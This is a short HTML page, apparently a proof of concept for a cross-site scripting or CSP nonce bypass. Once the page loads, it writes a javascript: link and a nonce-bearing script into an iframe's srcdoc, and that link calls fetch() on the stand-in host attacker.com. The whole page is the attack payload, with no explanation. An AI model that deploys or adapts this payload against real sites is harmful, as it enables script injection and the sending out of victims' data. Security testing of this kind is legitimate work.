<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGuIIMwGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGuIIMwGGGGG.addEventListener("load",()=>{GGGGGuIIMwGGGGG.srcdoc="<a id=a1 href='javascript:fetch(`https://attacker.com/report/report`)'>click<\/a><script nonce=123>GGGGuIIMwGGGG.click();<\/script>";},{once:true});
};
</script>
</body>
</html>